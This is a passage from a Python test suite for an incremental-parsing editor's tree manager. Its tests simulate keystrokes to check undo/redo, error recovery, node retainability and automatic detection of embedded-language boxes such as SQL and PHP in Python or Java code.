self.treemanager.key_normal('*')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 6)
self.treemanager.key_normal('}')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('v')
def test_undo_random_insertdeleteundo_bug8_loop(self):
self.reset()
self.treemanager.import_file("""class Connect4():
UI_DEPTH = 5
def __init__():
self.top = tk.Tk()
self.top.title()
self.turn = None
self.ai_players = 1
pass""")
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 18)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 6)
self.treemanager.key_normal('4')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 11)
self.treemanager.key_normal(')')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 13)
self.treemanager.key_normal('n')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 2)
self.treemanager.key_normal('9')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 2)
self.treemanager.key_normal('&')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 3)
self.treemanager.key_normal('+')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 14)
self.treemanager.key_normal('5')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal(',')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal('1')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 7)
self.treemanager.key_normal('c')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 15)
self.treemanager.key_normal('*')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 9)
self.treemanager.key_normal('(')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 6)
self.treemanager.key_normal('}')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('v')
def test_undo_random_insertdeleteundo_bug9(self):
"""This test fails if the retainablity check doesn't include a same_pos
check as described by Wagner. The node `(` which pre-parse is a child of
`atom` is moved outside of (and before) `atom` during the parse. Then
error recovery happens and `atom` is checked for retainablity, but now
it does not contain `(` but instead has gained a newline. This means the
textlength-check succeeds, but it's position has changed due to `(` now
being before `atom`. So the retain check must fail."""
self.reset()
self.treemanager.import_file("""class Connect4():
def __init__():
self.top
self.newgamebutton
self.new""")
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 9)
self.treemanager.key_normal('(')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 9)
self.treemanager.key_normal(' ')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('=')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 3)
self.treemanager.key_normal('[')
def random_insert_delete_undo(self, program):
import random
self.reset()
#self.save()
self.treemanager.import_file(program)
assert self.parser.last_status == True
#self.save()
self.text_compare(program)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(5))
random.shuffle(cols)
for col in cols:
last_was_undo = False
print("self.treemanager.cursor_reset()")
self.treemanager.cursor_reset()
print("self.move(DOWN, %s)" % (linenr))
print("self.move(RIGHT, %s)" % (col))
self.move(DOWN, linenr)
self.move(RIGHT, col)
k = self.get_random_key()
if k in ["a", "c", "e", "g", "i", "k", "m", "1", "3", "5", "7"]:
# for a few characters DELETE instead of INSERT
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
elif k in ["o", "q", "s", "u"]:
print("self.treemanager.key_ctrl_z()")
x = self.treemanager.key_ctrl_z()
last_was_undo = True
else:
key = self.get_random_key()
print("self.treemanager.key_normal(%s)" % (repr(key)))
x = self.treemanager.key_normal(key)
if x == "eos":
continue
if not last_was_undo:
print("self.treemanager.undo_snapshot()")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(program)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_infinite_loop(self):
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.treemanager.key_ctrl_z()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
def test_bug_undo_loop_2(self):
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 3)
self.treemanager.key_normal('#')
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 3)
self.treemanager.key_normal(')')
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(programs.pythonsmall)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_undo_typing(self):
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 0)
self.treemanager.key_normal("g")
self.treemanager.key_ctrl_z()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 2)
self.treemanager.key_normal("%")
self.treemanager.key_ctrl_z()
self.treemanager.cursor_reset()
self.move(DOWN, 13)
self.move(RIGHT, 0)
self.treemanager.key_normal("y")
class Test_Undo_LBoxes(Test_Helper):
def setup_class(cls):
parser, lexer = phppython.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, phppython.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def test_simple(self):
self.reset()
self.treemanager.import_file(programs.phpclass)
self.move(UP, 1)
self.treemanager.add_languagebox(lang_dict["Python + PHP"])
self.treemanager.key_normal("p")
self.treemanager.key_normal("a")
self.treemanager.key_normal("s")
self.treemanager.key_normal("s")
self.treemanager.undo_snapshot()
self.move(DOWN, 1)
self.treemanager.key_end()
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
def test_simple2(self):
pytest.skip("For some reason copy.deepcopy errors on this test with the new history service.")
self.versions = []
self.reset()
self.versions.append(self.treemanager.export_as_text())
self.treemanager.import_file(programs.phpclass)
self.versions.append(self.treemanager.export_as_text())
self.move(DOWN, 1)
self.treemanager.add_languagebox(lang_dict["Python + PHP"])
text = "def x():\r pass"
for c in text:
self.treemanager.key_normal(c)
self.treemanager.undo_snapshot()
import copy
dp = copy.deepcopy(self.parser.previous_version.parent)
self.versions.append(self.treemanager.export_as_text())
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
self.versions.append(self.treemanager.export_as_text())
self.move(UP, 2)
self.treemanager.key_end()
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
self.versions.append(self.treemanager.export_as_text())
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
self.versions.append(self.treemanager.export_as_text())
assert self.versions.pop() == self.treemanager.export_as_text()
self.treemanager.key_ctrl_z()
assert self.versions.pop() == self.treemanager.export_as_text()
self.treemanager.key_ctrl_z()
assert self.versions.pop() == self.treemanager.export_as_text()
self.treemanager.key_ctrl_z()
assert self.versions.pop() == self.treemanager.export_as_text()
self.tree_compare(self.parser.previous_version.parent, dp)
def test_clean_version_bug(self):
self.reset()
self.treemanager.import_file(programs.phpclass)
self.move(DOWN, 1)
self.treemanager.add_languagebox(lang_dict["Python + PHP"])
self.treemanager.key_normal("p")
self.treemanager.key_normal("a")
self.treemanager.key_normal("s")
self.treemanager.key_normal("s")
self.treemanager.undo_snapshot()
import copy
dp = copy.deepcopy(self.parser.previous_version.parent)
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.tree_compare(self.parser.previous_version.parent, dp)
self.move(UP, 1)
self.treemanager.key_end()
self.move(LEFT, 2)
self.treemanager.key_normal("x")
self.treemanager.undo_snapshot()
dp2 = copy.deepcopy(self.parser.previous_version.parent)
self.treemanager.key_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.tree_compare(self.parser.previous_version.parent, dp2)
class Test_InputLogger(Test_Python):
def test_simple(self):
log = """self.key_normal('c')
self.key_normal('l')
self.key_normal('a')
self.key_normal('s')
self.key_normal('s')
self.key_normal(' ')
self.key_shift()
self.key_normal('X')
self.key_shift()
self.key_normal(':')
self.key_normal('\r')
self.key_normal(' ')
self.key_normal('d')
self.key_normal('e')
self.key_normal('f')
self.key_normal(' ')
self.key_normal('x')
self.key_backspace()
self.key_normal('y')
self.key_shift()
self.key_normal('o')
self.key_normal('o')
self.key_shift()
self.key_normal('(')
self.key_shift()
self.key_normal(')')
self.key_normal(':')
self.key_normal('\r')
self.key_normal(' ')
self.key_normal('x')
self.key_normal(' ')
self.key_normal('=')
self.key_normal(' ')
self.key_normal('1')
self.key_cursors(KEY_UP, False)
self.key_cursors(KEY_LEFT, False)
self.key_cursors(KEY_LEFT, False)
# mousePressEvent
self.cursor.line = 1
self.cursor.move_to_x(11)
self.selection_start = self.cursor.copy()
self.selection_end = self.cursor.copy()
self.cursor.line = 1
self.cursor.move_to_x(8)
self.selection_end = self.cursor.copy()
self.cursor.line = 2
self.key_normal('f')
self.key_normal('o')
self.key_normal('o')
# mousePressEvent
self.cursor.line = 2
self.cursor.move_to_x(16)
self.selection_start = self.cursor.copy()
self.selection_end = self.cursor.copy()
self.key_backspace()
self.add_languagebox('SQL (Dummy)')
self.key_shift()
self.key_normal('S')
self.key_normal('E')
self.key_normal('L')
self.key_normal('E')
self.key_normal('C')
self.key_normal('T')
self.key_normal(' ')
self.key_shift()
self.key_normal('*')
self.key_shift()
self.key_normal(' ')
self.key_normal('F')
self.key_normal('R')
self.key_normal('O')
self.key_normal('M')
self.key_normal(' ')
self.key_normal('t')
self.key_normal('a')
self.key_normal('b')
self.key_normal('l')
self.key_normal('e')"""
self.treemanager.apply_inputlog(log)
assert self.treemanager.export_as_text() == """class X:
def foo():
x = SELECT * FROM table"""
class Test_Comments_Indents(Test_Python):
def test_newline(self):
self.reset()
for c in "y = 12 # blaz = 13":
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.move(LEFT, 6)
self.treemanager.key_normal("\r")
assert self.parser.last_status == True
def test_single_line_comment(self):
self.reset()
for c in """x = 12
y = 13""":
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.move(LEFT, 6)
self.move(UP, 1)
self.treemanager.key_normal("#")
assert self.parser.last_status == True
class Test_ChangeReporting(Test_Helper):
def setup_class(cls):
parser, lexer = calc.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, calc.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def test_right_sibling_bug(self):
for k in "1+2+3":
self.treemanager.key_normal(k)
self.move(LEFT, 3)
self.treemanager.key_normal("+")
self.move(RIGHT, 2)
self.treemanager.key_normal("+")
self.move(LEFT, 1)
self.treemanager.key_normal("4")
class Test_ErrorRecovery(Test_Helper):
def setup_class(cls):
parser, lexer = calc.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
one = TextNode(Terminal("1"))
one.lookup = "INT"
cls.parser.previous_version.parent.children[0].insert_after(one)
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, calc.name)
cls.treemanager.set_font_test(7, 17)
def test_simple(self):
self.treemanager.import_file("1*1+2+3*4+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("+")
assert self.parser.last_status == False
def test_empty(self):
self.reset()
assert self.parser.last_status == False
def test_slow_input(self):
self.reset()
assert self.parser.last_status == False
self.treemanager.key_normal("1")
self.treemanager.key_normal("+")
assert self.parser.last_status == False
self.treemanager.key_normal("2")
assert self.parser.last_status == True
def test_simple2(self):
self.reset()
self.treemanager.import_file("1+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
def test_simple3(self):
self.reset()
self.treemanager.import_file("1+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 2)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
def test_double_error(self):
self.reset()
assert self.parser.last_status == False
self.treemanager.import_file("1*1+2+3*4+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("+")
self.move(LEFT, 5)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
assert len(self.parser.error_nodes) == 2
def test_triple_error(self):
self.reset()
assert self.parser.last_status == False
self.treemanager.import_file("1*1+2+3*4+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("+")
assert len(self.parser.error_nodes) == 1
self.move(LEFT, 5)
self.treemanager.key_normal("*")
assert len(self.parser.error_nodes) == 2
self.move(LEFT, 3)
self.treemanager.key_normal("+")
assert len(self.parser.error_nodes) == 3
assert self.parser.last_status == False
def test_error_in_isotree(self):
self.reset()
self.treemanager.import_file("1+2*3")
self.treemanager.key_home()
self.move(RIGHT, 2)
self.treemanager.key_normal("*")
assert len(self.parser.error_nodes) == 1
self.move(RIGHT, 2)
self.treemanager.key_normal("+")
assert len(self.parser.error_nodes) == 2
def test_error_in_isotree_reverse(self):
self.reset()
self.treemanager.import_file("1+2*3")
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("+")
assert len(self.parser.error_nodes) == 1
self.move(LEFT, 3)
self.treemanager.key_normal("*")
assert len(self.parser.error_nodes) == 2
def test_testing_ooc1(self):
# Testing out-of-context analysis where the analysis fails and the result
# can not be integrated into the tree
self.reset()
self.treemanager.import_file("1+2")
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("*")
self.treemanager.key_end()
self.treemanager.key_normal("+")
self.treemanager.key_normal("3")
def test_testing_ooc2(self):
# Testing out-of-context analysis where the analysis succeeds and the result
# is being integrated into the tree
self.reset()
self.treemanager.import_file("1+2")
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("*")
self.treemanager.key_end()
self.treemanager.key_normal("*")
assert self.treemanager.cursor.node.symbol.name == "*"
self.treemanager.key_normal("3")
assert self.treemanager.cursor.node.symbol.name == "3"
assert self.treemanager.cursor.node.left == None # if ooc fails, this would be '*'
def test_typing_after_successfull_ooc(self):
self.reset()
self.treemanager.import_file("1+2")
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("*")
self.treemanager.key_end()
self.treemanager.key_normal("*")
self.treemanager.key_normal("3")
assert self.parser.last_status == False
assert len(self.parser.error_nodes) > 0
# continue after successful out-of-context analysis and integration
self.treemanager.key_normal("+")
assert self.parser.last_status == False
assert len(self.parser.error_nodes) > 0
self.treemanager.key_normal("3")
assert self.parser.last_status == False
assert len(self.parser.error_nodes) > 0
def test_temp(self):
self.reset()
self.treemanager.import_file("1+2*3")
self.treemanager.key_end()
self.move(LEFT, 4)
self.treemanager.key_normal("*")
self.move(RIGHT, 2)
self.treemanager.key_normal("+")
def test_changes_in_isotree(self):
self.reset()
self.treemanager.import_file("1+2*3")
self.treemanager.key_home()
self.move(RIGHT, 1)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
self.move(RIGHT, 3)
self.treemanager.key_normal("+")
assert self.parser.last_status == False
def test_nested_errors(self):
self.reset()
self.treemanager.key_normal("1")
self.treemanager.key_normal("+")
self.treemanager.key_normal("2")
self.move(LEFT, 2)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
self.move(RIGHT, 1)
self.treemanager.key_normal("+")
assert self.parser.last_status == False
self.move(LEFT, 1)
self.treemanager.key_normal("2")
assert self.parser.last_status == False
self.move(LEFT, 1)
self.treemanager.key_backspace()
assert self.parser.last_status == True
class Test_ErrorRecoveryPython(Test_Python):
def test_delete(self):
self.reset()
self.treemanager.import_file("class X:\n pass")
for i in range(18):
self.treemanager.key_delete()
def test_foo(self):
self.reset()
self.treemanager.import_file("class X:\n def x():\n x = 1")
self.move(DOWN, 2)
self.treemanager.key_end()
self.treemanager.key_backspace()
self.treemanager.key_normal("]")
self.treemanager.key_normal("e")
def test_nodereuse_bug(self):
t = TreeManager()
parser, lexer = calc.load()
t.add_parser(parser, lexer, "Calc")
t.key_normal("1")
t.key_normal("+")
t.key_normal("2")
# remember nodes
t.key_home()
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "1"
P = t.cursor.node.parent
T = t.cursor.node.parent.parent
E = t.cursor.node.parent.parent.parent
assert P.symbol.name == "P"
assert T.symbol.name == "T"
assert E.symbol.name == "E"
t.key_normal("+")
# check if nodes have been reused
t.key_home()
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "1"
assert t.cursor.node.parent is P
assert t.cursor.node.parent.parent is T
assert t.cursor.node.parent.parent.parent is E
class Test_ErrorRecoveryJava(Test_Java):
def test_delete(self):
self.reset()
self.treemanager.import_file("class X{\n int x;\n}")
for i in range(36):
self.treemanager.key_delete()
def test_foo(self):
self.reset()
self.treemanager.import_file("class X{\n public void main()(){\n int x = 1;\n}\n}")
self.move(DOWN, 2)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_backspace()
self.treemanager.key_normal("]")
self.treemanager.key_normal("e")
from grammars.grammars import EcoFile
class Test_ErrorRecoveryRightbreakdown:
def test_simple(self):
# With the default Wagner implementation this test breaks upon
# attempting a rightbreak on a subtree that has been isolated.
# The Wagner thesis doesn't mention anything related to this, which
# either means they didn't run into this or they are doing something
# behind the scenes that they don't talk about.
# My solution is simply to cancel the rightbreakdown procedure when it sees
# an isolated subtree.
grm = EcoFile("Errortest", "test/errortest.eco", "Error")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, python.name)
t.key_normal("a")
t.key_normal("b")
t.key_normal("w")
t.key_normal("s")
assert parser.last_status == True
t.key_cursors(LEFT)
t.key_cursors(LEFT)
t.key_cursors(LEFT)
t.key_normal("c")
t.key_delete()
assert parser.last_status == False
class Test_ErrorRecoverySurroundingContext:
def test_simple(self):
# This test checks the correct behaviour for skipping already isolated
# subtrees. Before we can skip an isolated subtree, we need to make sure
# that it's surrounding context hasn't changed. The surrounding context
# of an isolated subtree is it's next terminal. So if the left-most
# subtree to the right of the isolated subtree has changes, we need to
# reevalute the isolated subtree and cannot skip it.
# Also tests if isolated subtrees are reached at all as we need to keep
# a changed path down to the isotree to recheck their surrounding
# context.
grm = EcoFile("ErrortestSur", "test/errorsurroundingcontext.eco", "ErrorSurround")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, python.name)
t.key_normal("a")
t.key_normal("c")
t.key_cursors(LEFT)
t.key_normal("b")
t.key_cursors(RIGHT)
t.key_normal("d")
assert parser.last_status == True
t.key_home()
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "ab"
# without checking surrounding context this would be 'left'
assert t.cursor.node.parent.symbol.name == "left2"
class Test_RetainSubtree:
def test_simple(self):
# This test checks that if a node is being retained but it's parent node
# was reset, that the siblings of the node are updated as well, as they
# could have changed when the parent was reverted back to the previous
# version.
grm = EcoFile("RetainTest", "test/retaincalc.eco", "RetainTest")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, "RT")
t.key_normal("1")
t.key_normal("+")
t.key_normal("2")
t.key_home()
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "1"
assert t.cursor.node.parent.symbol.name == "P"
t.key_normal("*")
t.key_cursors(LEFT)
assert t.cursor.node.symbol.name == "1"
assert t.cursor.node.parent.symbol.name == "P" # must not be 'X'
def test_simple2(self):
# Tests basic retainablity
grm = EcoFile("RetainTest2", "test/retaincalc2.eco", "RetainTest2")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, "RT")
t.key_normal("1")
t.key_normal("*")
t.key_normal("2")
# Create an error
t.key_cursors(LEFT)
t.key_normal("*")
# Add changes that can be retained
t.key_home()
t.key_cursors(RIGHT)
t.key_normal("-")
t.key_normal("3")
assert t.cursor.node.symbol.name == "3"
assert t.cursor.node.parent.symbol.name == "X" # will be 'P' without retaining
def test_bug1(self):
"""There is currently a bug in the retainability algorithm that causes
an infinite loop when a certain subtree is retained. In this test case
the bug happens when an empty non-terminal A (child of node B) is being
reused and becomes a child of another node C. After error recovery the
previous parent (B) is reverted which includes resetting A as well.
However the new parent (C) is being retained, causing it to keep a child
reference to A. Now A is being referenced by two different parents (B
and C), causing an infinite loop when traversing the parse tree. The
implementation however is correct and the error can also be reproduced
when manually applying Wagners algorithm to this problem. For this
reason retainability is current disabled in the parser until this
problem has been resolved."""
t = TreeManager()
parser, lexer = python.load()
t.add_parser(parser, lexer, "Python")
for c in "class X:\n pass":
t.key_normal(c)
t.key_cursors(UP)
t.key_home()
t.key_delete()
t.key_delete()
t.key_delete()
t.key_delete()
t.key_delete()
startrule = parser.previous_version.parent.children[1]
assert startrule.symbol.name == "Startrule"
WS = startrule.children[0]
assert WS.symbol.name == "WS"
assert WS.parent is startrule
classdef = startrule.children[1].children[0].children[0].children[0].children[0]
assert classdef.symbol.name == "classdef"
WS2 = classdef.children[1]
assert WS2.symbol.name == "WS"
WS3 = WS2.children[0]
assert WS3.symbol.name == "WS"
# current retaining creates a loop here as 'WS' is partly reverted and
# retained at the same time
assert WS3 is not WS
class Test_TopDownReuse(Test_Python):
def test_basic(self):
grm = EcoFile("Undotest", "test/undobug1.eco", "Undo")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, python.name)
t.key_normal("a")
t.undo_snapshot()
t.key_normal("b")
t.undo_snapshot()
t.key_normal("c")
t.undo_snapshot()
assert parser.last_status == True
startrule = parser.previous_version.parent.children[1]
E = startrule.children[1]
assert E.symbol.name == "E"
Y = E.children[0]
assert Y.symbol.name == "Y"
t.key_cursors(LEFT)
t.key_cursors(LEFT)
t.key_normal("x")
t.undo_snapshot()
assert parser.last_status == True
startrule2 = parser.previous_version.parent.children[1]
E2 = startrule2.children[1]
assert E2.symbol.name == "E"
Y2 = E2.children[0]
assert Y2.symbol.name == "Y"
# check if they have been reused
assert startrule is startrule2
assert E is E2
assert Y is Y2
sql_single = lang_dict["SQL Statement"]
javapy = lang_dict["Java + Python"]
javasql = lang_dict["Java + SQL"]
javasqlchemical = javasql
# Add some more compositions that we only need inside the test environment
pythonsql = EcoFile("Python + SQL", "grammars/python275.eco", "Python")
pythonsql.add_alternative("atom", sql_single)
lang_dict[pythonsql.name] = pythonsql
import json
from grammars.grammars import create_grammar_from_config
with open("test/javasqldummy.json") as f:
cfg = json.load(f)
javasql2_name = create_grammar_from_config(cfg, "test/javasqldummy.json")
javasqlchemical = lang_dict[javasql2_name]
grm_cache = {}
def load_json_grammar(filename):
if filename in grm_cache:
return grm_cache[filename]
with open(filename) as f:
cfg = json.load(f)
name = create_grammar_from_config(cfg, filename)
grm = lang_dict[name]
grm_cache[filename] = grm
return grm
class Test_AutoLanguageBoxDetection():
def test_pythonsql(self):
parser, lexer = pythonsql.load()
parser.setup_autolbox(pythonsql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = SELECT * FROM table WHERE y=1":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == True
def test_pythonsql2(self):
parser, lexer = pythonsql.load()
parser.setup_autolbox(pythonsql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
treemanager.key_normal(";")
treemanager.key_cursors(LEFT)
for c in "x = SELECT * FROM table":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
def test_java_python(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "class X {\n\n}":
treemanager.key_normal(c)
assert parser.last_status == True
treemanager.key_cursors(UP)
for c in " def x():\n ":
treemanager.key_normal(c)
assert parser.last_status == False
assert len(treemanager.parsers) == 1
treemanager.key_normal("p")
assert parser.last_status == True
assert len(treemanager.parsers) == 2
def test_java_python2(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "class X {\n\n\n\n}":
treemanager.key_normal(c)
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
for c in " def x():\n ":
treemanager.key_normal(c)
assert parser.last_status == False
assert len(treemanager.parsers) == 1
treemanager.key_normal("p")
assert parser.last_status == True
assert len(treemanager.parsers) == 2
@pytest.mark.xfail
def test_java_python3(self):
"""Currently fails as `public` is being parsed into the Python language
box."""
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
code = """class X {
public void y(){
}
}"""
for c in code:
treemanager.key_normal(c)
assert parser.last_status == True
treemanager.key_cursors(LEFT)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
for c in " def x():\n ":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == False
treemanager.key_normal("p")
assert len(treemanager.parsers) == 2
assert parser.last_status == True
def test_php_python5_first_line_box(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "def x():\n ":
treemanager.key_normal(c)
treemanager.key_normal("p")
assert parser.last_status == True
assert len(treemanager.parsers) == 2
def test_php_python_expression(self):
"""Results in two options for language box:
Python or Python expression"""
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "$x = [x for x in range(10)":
treemanager.key_normal(c)
assert parser.last_status == False
treemanager.key_normal("]")
treemanager.leave_languagebox()
treemanager.key_normal(";")
assert len(parser.error_nodes) == 1
assert len(parser.error_nodes[0].autobox) == 2
def test_php_python_expression2(self):
"""Previously, we could only find the `not 2` option here. With the
introduction of the line heuristic, we can now find the full expression
`1 or not 2` as well."""
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "$x = 1 or not ":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert len(parser.error_nodes) == 1
assert parser.error_nodes[0].autobox is None
treemanager.key_normal("2")
treemanager.key_normal(";")
assert len(parser.error_nodes) == 1
assert len(parser.error_nodes[0].autobox) == 4
def test_include_rules(self):
grm = EcoFile("Python + HTML (Include)", "grammars/python275.eco", "Python")
grm.add_alternative("atom", html)
grm.set_auto_include("HTML", set(["<html", "<img"]))
lang_dict[grm.name] = grm
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = <html></html>":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
parser.reset()
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = <span></span>":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
def test_exclude_rules(self):
grm = EcoFile("Python + HTML (Exclude)", "grammars/python275.eco", "Python")
grm.add_alternative("atom", html)
grm.set_auto_exclude("HTML", set(["TEXT"]))
lang_dict[grm.name] = grm
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = <span></span>":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
parser.reset()
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
